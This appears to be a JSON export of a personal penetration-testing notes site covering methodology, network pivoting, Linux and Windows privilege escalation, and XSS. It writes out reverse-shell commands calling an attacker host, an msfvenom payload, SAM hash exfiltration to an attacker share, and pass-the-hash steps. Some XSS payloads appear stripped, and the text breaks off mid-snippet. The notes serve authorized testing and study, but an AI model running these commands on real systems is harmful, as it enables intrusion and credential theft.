{"index":[{"content":"Pentesting* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)\nAuthorized audit of security systems of computers and networks.\n* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)\n * Permissions\n * Engagement --> internal/external pentest or adversary emulation of APTs\n * Scope --> networks, IPs, exfilration of data, which stage, downtime, DDoS\n * Rules\n* NDA\n\n## Campaign\n* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)\n* [vectr.io](https://vectr.io)\n\n* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines\n* Operations --> Operators, Known Information, Responsibilities\n* Mission --> Exact commands to run and execution time of the engagement\n* Remediation --> Report, Remediation consultation\n\n## Methodology\n\n* Steps\n * Reconnaissance\n * Enumeration/Scanning\n * Gaining Access\n * Privilege Escalation\n * Covering Tracks\n * Reporting\n\n### Reconnaissance\n* Duck / SearX / metacrawler / google\n* Wikipedia\n* [Shodan.io](http://www.shodan.io)\n* PeopleFinder.com\n* who.is\n* sublist3r\n* hunter.io\n* builtwith.com\n* wappalyzer\n\n### Enumeration\n* nmap\n* nikto\n* gobuster\n* dirbuster\n* metasploit\n* enum4linux / linpeas / winpeas / linenum\n\n### Exploitation\n\n### Post Exploitation\n* Pivoting\n#### Privilege Escalation\n* Vertically or horizontally\n\n#### Covering Tracks\n\n#### Reporting\n* Includes\n * Vulnerabilities\n * Criticality\n * Description\n * Countermeasures \n * Finding summary\n\n## Frameworks\n* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)\n* [NIST](https://www.nist.gov/cyberframework)\n* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)\n\n## Testing Webapps\n\n* Two methods\n1. Every Page and its functions one by one\n2. Test by stages \n * Authorization\n * Authentication\n * Injection\n * Client Side Controls\n * Application Logic\n","description":"","tags":[],"title":"Pentesting","uri":"/README.html"},{"content":"Pivoting\n* Tunnelling/Proxying\n* Port Forwarding\n\n## Enumeration \n### Using material found on the machine and preinstalled tools\n* `arp -a`\n* `/etc/hosts` or `C:\\Windows\\System32\\drivers\\etc\\hosts`\n* `/etc/resolv.conf`\n* `ipconfig /all`\n* `nmcli dev show`\n* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)\n\n### Scripting Techniques\n```sh\nfor i in {1..255}; do (ping -c 1 192.168.0.${1} | grep \"bytes from\" &); done\nfor i in {1..65535}; do (echo > /dev/tcp/$i) >/dev/null 2>&1 && echo $i is open; done\n```\n* Using local tools through a proxy like `nmap`\n\n## Tools\n\n* Enumerating a network using native and statically compiled tools\n\n### Proxychains / FoxyProxy\n\n* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains\n ```sh\n ssh @$ATTACKER_IP -R 9050 -N\n ```\n* Proxychains, e.g. scan target via nmap, or connect via nc through jump server\n ```sh\n proxychains nc \n proychains nmap \n proxychains ssh user@$TARGET_IP\n proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS\n proxychains wget http://$TARGET_IP:8000/loot.zip\n ```\n * Use `/etc/proxychains.conf` or `./proxychains.conf`containing:\n ```sh\n [ProxyList]\n # add proxy here ...\n # meanwhile\n # defaults set to \"tor\"\n socks4 9050\n #socks5 1337\n # proxy_dns\n ``` \n* FoxyProxy, choose proxy type, proxy IP and port in settings \n\n### SSH port forwarding and tunnelling (primarily Unix)\n\n* LocalPortForwarding\n ```sh\n ssh -L $LOCAL_PORT:: @ -fN\n ```\n * Another possibility to use the jumpserver directly on it's cli via `ssh @ -L *:$LOCAL_PORT: -N`. One can connect now to the target via the jumpserver\n * Tip: open port on windows target via\n ```sh\n netsh advfirewall firewall add rule name=\"new port\" dir=in action=allow protocol=TCP localport=%PORT%\n ```\n\n* Dynamic Port Forwarding\n ```sh\n ssh -D $PORT @ -fN\n ```\n\n* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via\n ```sh\n ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN\n ```\n * Tip1: create a user on the attacker to receive the connection without compromising your own password\n * Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target\n\n### plink.exe (Windows)\n* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)\n```sh\ncmd.exe /c echo y | .\\plink.exe -R :: @ -i -N\n```\n* Key generation\n ```sh\n puttygen -o key.ppk\n ```\n* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) \n```sh\necho y | &.\\plink.exe -ssh -l -pw -R :: \n```\n\n### Socat\n\n* Reverse shell on target via\n ```sh\n ./socat tcp-l:8000 tcp::443 &\n ```\n * Attacking bind shell\n ```sh\n sudo nc -lvnp 443\n ```\n\n* Relay on jumpserver via\n ```sh\n ./socat tcp-l:33060,fork,reuseaddr tcp::3306 &\n ```\n\n* Quiet Port Forwarding\n * On attacker\n ```sh\n socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &\n ```\n * On relay server\n ```sh\n ./socat tcp::8001 tcp::,fork &\n ```\n * Open `localhost:8000`\n\n* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.\n\n* In need of a Download on target, expose a port on the attacker via relay\n ```sh\n socat tcp-l:80,fork tcp:$ATTACKER_IP:80\n ```\n\n### Chisel\n* **Does not require SSH on target**\n* Reverse Proxy\n * Bind port on attacker\n ```sh\n ./chisel server -p --reverse &\n ```\n * Reverse port on target/proxy\n ```sh\n ./chisel client : R:socks &\n ```\n * `proxychains.conf` contains\n ```sh\n [ProxyList]\n socks5 \n ```\n\n* Forward SOCKS Proxy\n * Proxy/compromised machine\n ```sh\n ./chisel server -p --socks5\n ```\n * On attacker\n ```sh\n ./chisel client : :socks\n ```\n* Remote Port Forward\n * On attacker\n ```sh\n ./chisel server -p --reverse &\n ```\n * On forwarder\n ```sh\n ./chisel client : R::: &\n ```\n* Local Port Forwarding\n * On proxy\n ```sh\n ./chisel server -p \n ```\n * On attacker\n ```sh\n ./chisel client : ::\n ```\n\n### sshuttle\n* `pip install sshuttle`\n* `sshuttle -r @ `\n* or automatically determined\n```sh\nsshuttle -r @ -N\n```\n* Key based auth\n```sh\nsshuttle -r @ --ssh-cmd \"ssh -i \" \n```\n* Exclude servers via `-x`, for example the target/gateway server\n\n### Meterpreter\n* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do\n```sh\nportfwd add -l 22 -p 22 -r\n```\n\n#### Meterpreter Auto Routing\n\n* Upload payload and catch it with `multi/handler`\n```\nbackground\nuse post/multi/manage/autoroute\nset session 1\nset subnet <>\nrun\n```\n\n#### Meterpreter Proxy Routing\n\n* Specify socks proxy via\n```sh\nuse auxiliary/server/socks_proxy\n```\n* Set proxychain on attacker accordingly\n\n### rpivot\n\n* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)\n* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)\n\n## Links\n\n* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)\n","description":"","tags":[],"title":"Pivoting","uri":"/post exploitation/pivoting.html"},{"content":"Linux Exploit Suggester 2\n=========================\n\nNext-generation exploit suggester based on [Linux_Exploit_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)\n\nKey Improvements Include:\n* More exploits! (Last updated: March 27, 2019)\n* Option to download exploit code directly from Exploit DB\n* Accurate wildcard matching. This expands the scope of searchable exploits.\n* Output colorization for easy viewing.\n* And more to come!\n\nThis script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments. \n\nUsage\n==============\n\nWhen run without arguments, the script performs a 'uname -r' to grab the Linux operating system release version, and returns a list of possible exploits. Links to CVEs and applicable exploit POCs are included. Keep in mind that a patched/back-ported patch may fool this script.\n\n```\n$ ./linux-exploit-suggester.pl\n\n Local Kernel: 4.4.0\n Searching among 73 exploits...\n\n Possible Exploits\n [1] af_packet\n CVE-2016-8655\n Source: http://www.exploit-db.com/exploits/40871\n [2] dirty_cow\n CVE-2016-5195\n Source: http://www.exploit-db.com/exploits/40616\n [3] exploit_x\n CVE-2018-14665\n Source: http://www.exploit-db.com/exploits/45697\n [4] get_rekt\n CVE-2017-16695\n Source: http://www.exploit-db.com/exploits/45010\n```\n\nUse the **-k** flag to manually enter a wildcard for the kernel/operating system release version.\n\n```\n$ ./linux-exploit-suggester.pl -k 3\n```\n\nUse the **-d** flag to open a download menu to retrieve exploit code directly from Exploit DB. You can either download all exploits or select them individually by number.\n\n```\n$ ./linux-exploit-suggester.pl -d\n\n Exploit Download\n (Download all: 'a' / Individually: '2,4,5' / Exit: ^c)\n Select exploits to download: a\n\n Downloading https://www.exploit-db.com/raw/40871 -> exploit_af_packet\n Downloading https://www.exploit-db.com/raw/40616 -> exploit_dirty_cow\n Downloading https://www.exploit-db.com/raw/45697 -> exploit_exploit_x\n Downloading https://www.exploit-db.com/raw/45010 -> exploit_get_rekt\n```\n\nUse the **-h** flag to display the help menu\n\nContributing\n============\n\nThis project is in active development. Feel free to suggest a new feature or open a pull request!\n","description":"","tags":[],"title":"","uri":"/post exploitation/priv_esc/kernel-exploits/linux-exploit-suggester-2/README.html"},{"content":"pspy\n* Snoop processes withou root permissions\n* [Repo](https://github.com/DominicBreuker/pspy.git)\n\n","description":"","tags":[],"title":"pspy","uri":"/post exploitation/priv_esc/docs/pspy.html"},{"content":"Linux Privilege Escalation\n## Links\n* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n* [LinEnum](https://github.com/rebootuser/LinEnum)\n* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)\n* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)\n* [GTFObins](https://gtfobins.github.io/) \n* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)\n\n## Kernel Exploits\n\n### Dirty COW\n* [CVE-2016-5195](https://dirtycow.ninja/)\n* [c0w.c](../kernel-exploits/dirtycow)\n\n## Stored Keys & Passwords\n* History\n* Environment Variables \n* Config + Dot Files\n* SSH keys\n```sh\nfind / -type f -name \"authorized_keys\" -o -name \"id_rsa\" 2>/dev/null\n```\n\n## Permissions\n* Weak permissions\n* Umask\n* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.\n * e.g. `john --wordlist=./wordlist --format=crypt hash`\n* SUID\n * list\n ```sh\n find / -perm /6000 -ls 2>dev/null\n ```\n * [Shared object injection](../../../exploit/linux/shared_object_injection.md)\n * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)\n* User specific files\n```sh\nfind / -user root -name \"*.txt\"\n```\n\n## Sudo Binary\n* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)\n* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)\n* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)\n* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)\n* `sudo -l` \n * Take a look at GTFObins\n * Keep an eye on the displayed host and env capabilities \n \n## PATH Hijacking\n* Interpositioning binaries via PATH\n * Look for binaries used in other bins and scripts\n * Interposition name and add the directory in front of `$PATH`\n\n## Bash function\n* Interpositioning of binaries via bash functions\n```sh\nfunction /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }\n```\n```sh\nexport -f /path/to/binary\n```\n* Call binary which invokes this function\n\n## Environment Variable\n```sh\nenv -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '; set +x; /tmp/bash -p'\n```\n\n## Capabilities\n* [capabilities](../../../exploit/linux/capabilities.md)\n\n## Crontab\n* Check `cat /etc/crontab`\n* Check writable scripts and binaries that are scheduled\n* Check `$PATH` order\n\n## NFS Rootsquash\n* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)\n","description":"","tags":[],"title":"Linux Privilege Escalation","uri":"/post exploitation/priv_esc/docs/linux_priv_esc.html"},{"content":"Windows Privilege Escalation\n## Links\n* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)\n* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)\n* [JAWS](https://github.com/411Hall/JAWS)\n* [winpeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)\n* [privescheck](https://github.com/itm4n/PrivescCheck)\n* [windows exploit suggester](https://github.com/bitsadmin/wesng)\n* [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)\n\n## Account Types\n\n* __Administrator__ local & domain\n* __Standard__ local & domain\n* __Guest__\n* __System__, local system, final escalation\n* __Local Service__, got anonymous connections over network.\n* __Network Service__, default service account, authentication via network\n## Enumeration\n\n### Users & Groups\n```sh\nwhoami /priv\nnet users\nnet users \nnet localgroup\nnet localgroup \nquery session\nqwinsta\n```\n\n### Files\n\n* [powershell](../../../../enumeration/windows/powershell.md)\n\n### System\n```sh\nhostname\nsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"\n```\n* Installed software, check for existing exploits\n```sh\nwmic product get name,version,vendor\n```\n* Services\n```sh\nwmic service list brief | findstr \"Running\"\n```\n\n## Exploit\n\n### DLL Hijacking\n* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)\n\n### Unquoted Service Path\n* [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)\n\n### Token Impersonation\n* `SeImpersonatePrivilege` is necessary, check via `whoami priv`\n* Hot Potato is best before Server 2019 and Windows 10 (version 1809)\n* [Potatos](../../../../exploit/windows/docs/potatoes.md)\n* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)\n\n### Schedules Tasks\n\n* `schtasks` and `schtasks /query /tn %TASK_NAME% /fo list /v`\n* `Autoruns64.exe`\n\n### MSI Elevated Installer\n\n* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)\n\n### Search for Credentials\n```sh\ncmdkey /list\n```\n* Use found credentials\n```sh\nrunas /savecred /user: reverse_shell.exe\n```\n* Keys containing passwords\n```\nreg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n```\n\n### accesschk64 Permissions\n* Check access to files and folders\n```sh\naccesschk64 -wvu \"file.exe\"\n```\n* If permission `SERVICE_CHANGE_CONFIG` is set\n```sh\n sc config binpath=\"net localgroup administrators user /add\"\n```\n* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)\n* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.\n\n#### accesschk64 for Services\n```sh\naccesschk64 -qlc \"service.exe\"\n```\n* If permission `SERVICE_ALL_ACCESS` is set it is configurable upload a reverse shell\n```sh\nicacls C:\\Windows\\Temp\\shell.exe /grant Everyone:F\n```\n* Reconfigure and restart service\n```sh\nsc config TheService binPath= \"C:\\Path\\to\\shell.exe\" obj= LocalSystem\nsc stop TheService\nsc start TheService\n```\n\n### Startup Application\n* Put reverse shell instead of an executable inside `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup` \n\n### Password Mining\n* Set up metasploit\n```sh\nuse auxiliary/server/capture/http_basic\nset srvport 7777\nset uripath pass\n```\n* Visit site on target\n\n### Unattended Windows Installation\n\n* Investigate the following paths to potentially find user credentials\n```sh\nC:\\Unattend.xml\nC:\\Windows\\Panther\\Unattend.xml\nC:\\Windows\\Panther\\Unattend\\Unattend.xml\nC:\\Windows\\system32\\sysprep.inf\nC:\\Windows\\system32\\sysprep\\sysprep.xml\n```\n* Watch out for the `` tags\n\n### Powershell History file\n\n```sh\nGet-Content %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n```\n\n### Internet Information Services (IIS)\n\n* Default web server on windows\n* Paths containing credentials are the following\n```sh\nC:\\inetpub\\wwwroot\\web.config\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\n```\n\n### Putty \n\n* Saved proxy password credentials may be found via\n```sh\nreg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f \"ProxyPassword\" /s\n```\n\n### schtask and icacls\n\n* Check `schtasks /query /tn %TASK_NAME% /fo list /v`\n* Check script for scheduled tasks, `F` means full access\n```sh\nicacls \n```\n* Put payload inside the script\n```sh\necho \"C:\\tmp\\nc.exe -e cmd.exe %ATTACKER_IP% 4711\" > \n```\n* Run the task\n```sh\nschtasks /run /tn \n```\n\n### Always Installs Elevated\n\n* These should be set\n```sh\nC:\\> reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\nC:\\> reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\n```\n\n* Craft `*.msi` file with a payload\n```sh\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f msi -o wizard.msi\n```\n\n* Upload and execute via\n```sh\nmsiexec /quiet /qn /i C:\\Windows\\Temp\\wizard.msi\n```\n\n### Service Misconfiguration\n\n* Check services, watch out for `BINARY_PATH_NAME` and `SERVICE_START_NAME`\n```sh\nsc qc apphostsvc\n```\n* Check found permissions via\n```sh\nicacls \n```\n* If the service binary path is writeable move the payload to its path and grant permissions\n```sh\nicacls /grant Everyone:F\n```\n```sh\nsc stop \nsc start \n```\n* Catch the reverse shell service\n\nOthers ways are:\n* Discretionary Access Control (DACL) can be opened via right click on the service and go to properties\n* All services are stored under `HKLM\\SYSTEM\\CurrentControlSet\\Services\\`\n\n### Unquoted Service Path\n\n* If `BINARY_PATH_NAME` spaces are escaped incorrectly. Its path will be resolved to every space from left to right. If there is a binary with a matching name inside the directory it will be started.\n* A created directory at install time inherits the permissions from its parent. Check it via\n```sh\nicacls \n```\n* Use `service-exe` payload in msfvenom upload the payload and move it on the path with the a fitting parital name of the service path\n* Set permissions\n```sh\nicacls C:\\Path/to/service.exe /grant Everyone:F\n```\n\n### Permissions\n\n* [priv2admin](https://github.com/gtworek/Priv2Admin)\n* `whoami /priv`\n\n#### SeBackup / Restore\n* If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened\n* Download `SAM` and `System` hashes\n```sh\nreg save hklm\\system C:\\Windows\\Temp\\system.hive\nreg save hklm\\sam C:\\Windows\\Temp\\sam.hive\n```\n* Start smb server on attack machine\n```sh\ncopy C:\\Windows\\Temp\\sam.hive \\\\ATTACKER_IP\\\ncopy C:\\Windows\\Temp\\system.hive \\\\ATTACKER_IP\\\n```\n* Dump the hashes\n```sh\nsecretsdump.py -sam sam.hive -system system.hive LOCAL\n```\n* Use pass the hash to login \n```sh\npsexec.py -hashes administrator@$TARGET_IP\n```\n\n#### SeTakeOwnership\n* If `SeTakeOwnership` is set one can take ownership of every file or service.\n```sh\ntakeown /f C:\\Windows\\System32\\Utilman.exe\nicacls C:\\Windows\\System32\\Utilman.exe /grant :F\ncopy cmd.exe utilman.exe\n```\n* Log out, on the Login screen click on `Ease of Access`\n\n\n#### SeImpersonate / SeAssignPrimaryToken\n\n* It is a rouge potato\n* Execute process as another user\n* Service accounts operate through impersonation\n* Check privileges via `whoami /priv` for these \n* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker\n```sh\nsocat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234\n```\n* Catch the potatoe executable from target via netcat\n\n","description":"","tags":[],"title":"Windows Privilege Escalation","uri":"/post exploitation/priv_esc/docs/windows/windows_priv_esc.html"},{"content":"Add user as system user```sh\nnet user /add\n```\n```sh\nnet localgroup Administrator /add\n```\n```sh\nnet localgroup \"Remote Management Users\" /add\n```\n```sh\nnet user \n```\n* connect via winRM\n\n\n","description":"","tags":[],"title":"Add user as system user","uri":"/post exploitation/priv_esc/docs/windows/add_user.html"},{"content":"Usage## Adhoc upload to target via http server\n* on local attacker\n```python3 -m http.server 8000```\nor \n```python -m SimpleHTTPServer```\n\n* on target\n```wget http://:8000/\n```\n\n* Cookie stealing\n\n```javascript\n\n```\n * Navigte to `/logs` and take sid\n\n* Open nc port and collect cookies\n```javascript\n\n\n\n```\n\n## Reflected XSS\nIn a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.\n* URL parameters inside GET queries\n* File paths\n\n### Usage\nAs script inside parameter\n```sh\nhttp://example.com/search?keyword=\n```\n* Show server IP\n```\nhttp://example.com/reflected?keyword=\n```\n* Session stealing, base64 encoded\n```javascript\n\n```\n * open netcat binder to catch the http queries\n\n## DOM based XSS\nWith DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:\n```javascript\nvar keyword = document.querySelector('#search')\nkeyword.innerHTML = \n```\n\n### Usage\n* Find the sub-object inside the document\n```javascript\ntest\" onmouseover=\"alert('YO!')\"\n```\n* Show cookie\n```\ntest\" onmouseover=\"alert(document.cookie)\"\n```\n## Bypass Filters\n* `script>alert(\"1\");</script>\n```\n* `alert()` sanitizing\n```javascript\n0\\\"autofocus/onfocus=alert(1)-->\"-confirm(3)-\"\n```\nor\n```javascript\n0\\\"autofocus/onfocus=alert(1)-->